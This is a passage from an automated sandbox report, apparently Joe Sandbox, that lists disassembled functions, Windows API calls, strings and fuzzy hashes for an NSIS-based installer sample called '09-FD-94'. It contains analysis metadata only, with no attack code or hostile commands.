                                                          • Associated: 00000000.00000002.1608921207.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1608963992.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                          Function 00405B19 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                          • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                          • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                          • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                          • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                          • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9

                                                          Non-executed Functions

                                                          Function 00404B6E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                          • GetDlgItem.USER32(?,?), ref: 00404B91
                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00404BDB
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                          • SetWindowLongW.USER32(?,?,00405166), ref: 00404C07
                                                          • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404C1B
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                          • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404C61
                                                          • DeleteObject.GDI32(00000000), ref: 00404C64
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                          • GetWindowLongW.USER32(?,?), ref: 00404D9F
                                                          • SetWindowLongW.USER32(?,?,00000000), ref: 00404DAD
                                                          • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404F35
                                                          • SendMessageW.USER32(?,?,00000000,?), ref: 00404F59
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                          • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                          • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                          • ShowWindow.USER32(00000000), ref: 0040514F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                          • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                          • Opcode Fuzzy Hash: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                          • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                          Function 0040335A Relevance: 63.4, APIs: 27, Strings: 9, Instructions: 383stringfilecomCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #17.COMCTL32 ref: 00403379
                                                          • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • SHGetFileInfoW.SHELL32(004206A8,00000000,?,?,00000000), ref: 004033B3
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,?,004033C8,00428200,NSIS Error), ref: 00405F55
                                                          • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                          • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                          • CharNextW.USER32(00000000,00434000,?), ref: 00403403
                                                          • GetTempPathW.KERNEL32(?,00436800,00000000,?), ref: 0040353B
                                                          • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
                                                          • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
                                                          • GetTempPathW.KERNEL32(?,00436800,00436800,\Temp), ref: 0040356C
                                                          • lstrcatW.KERNEL32(00436800,Low), ref: 00403574
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
                                                          • DeleteFileW.KERNEL32(00436000), ref: 004035A1
                                                          • OleUninitialize.OLE32(?), ref: 0040366C
                                                          • ExitProcess.KERNEL32 ref: 0040368C
                                                          • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
                                                          • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
                                                          • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
                                                          • SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
                                                          • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                          • CopyFileW.KERNEL32(00437800,0041FEA8,00000001), ref: 00403725
                                                          • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                          • GetCurrentProcess.KERNEL32(?,00000006,00000006,00000005,?), ref: 004037AC
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                          • ExitProcess.KERNEL32 ref: 00403827
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                          • API String ID: 4107622049-1875889550
                                                          • Opcode ID: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                          • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                          • Opcode Fuzzy Hash: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                          • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E
                                                          Function 004057D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNEL32(?,?,00436800,75572EE0,00434000), ref: 004057F9
                                                          • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,75572EE0,00434000), ref: 00405841
                                                          • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,75572EE0,00434000), ref: 00405864
                                                          • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,75572EE0,00434000), ref: 0040586A
                                                          • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,75572EE0,00434000), ref: 0040587A
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                          • FindClose.KERNEL32(00000000), ref: 00405929
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: \*.*
                                                          • API String ID: 2035342205-1173974218
                                                          • Opcode ID: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                          • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                          • Opcode Fuzzy Hash: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                          • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                          Function 0040659D Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                          • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                          • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                          • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                          Function 0040628B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,75572EE0,004057F0,?,00436800,75572EE0), ref: 00406296
                                                          • FindClose.KERNEL32(00000000), ref: 004062A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: 8WB
                                                          • API String ID: 2295610775-3088156181
                                                          • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                          • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                          Function 00405331 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282windowclipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                          • GetClientRect.USER32(?,?), ref: 004053DC
                                                          • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                          • ShowWindow.USER32(?,?), ref: 00405480
                                                          • GetDlgItem.USER32(?,?), ref: 004054A1
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                          • GetDlgItem.USER32(?,?), ref: 004053AE
                                                            • Part of subcall function 004041CF: SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD
                                                          • GetDlgItem.USER32(?,?), ref: 004054F3
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405508
                                                          • ShowWindow.USER32(00000000), ref: 0040552C
                                                          • ShowWindow.USER32(?,?), ref: 00405531
                                                          • ShowWindow.USER32(?), ref: 0040557B
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                          • CreatePopupMenu.USER32 ref: 004055C0
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                          • GetWindowRect.USER32(?,?), ref: 004055F4
                                                          • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 0040560D
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                          • OpenClipboard.USER32(00000000), ref: 00405655
                                                          • EmptyClipboard.USER32 ref: 0040565B
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                          • CloseClipboard.USER32 ref: 004056B6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {$&B
                                                          • API String ID: 590372296-2518801558
                                                          • Opcode ID: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                          • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                          • Opcode Fuzzy Hash: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                          • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69
                                                          Function 00403CC2 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                          • ShowWindow.USER32(?), ref: 00403D1B
                                                          • DestroyWindow.USER32 ref: 00403D2F
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                          • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                          • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                          • EnableWindow.USER32(?,?), ref: 00403F83
                                                          • EnableWindow.USER32(?,?), ref: 00403F9E
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                          • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                          • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403FD3
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                          • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                          • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID: &B
                                                          • API String ID: 184305955-3208460036
                                                          • Opcode ID: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                          • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                          • Opcode Fuzzy Hash: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                          • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E
                                                          Function 0040391F Relevance: 42.2, APIs: 15, Strings: 9, Instructions: 216stringregistrylibraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,75573420,00000000,00434000), ref: 004039A0
                                                          • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
                                                          • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                          • GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A87
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                          • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403ADC
                                                          • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                          • LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                          • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                          • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                          • API String ID: 914957316-1918744475
                                                          • Opcode ID: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                          • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                          • Opcode Fuzzy Hash: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                          • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D
                                                          Function 00404337 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 207windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                          • GetDlgItem.USER32(?,?), ref: 004043E9
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                          • GetSysColor.USER32(?), ref: 00404417
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                          • lstrlenW.KERNEL32(?), ref: 00404438
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                          • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                          • SendMessageW.USER32(00000000), ref: 004044BA
                                                          • GetDlgItem.USER32(?,?), ref: 004044E5
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                          • SetCursor.USER32(00000000), ref: 00404539
                                                          • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                          • SetCursor.USER32(00000000), ref: 0040455D
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
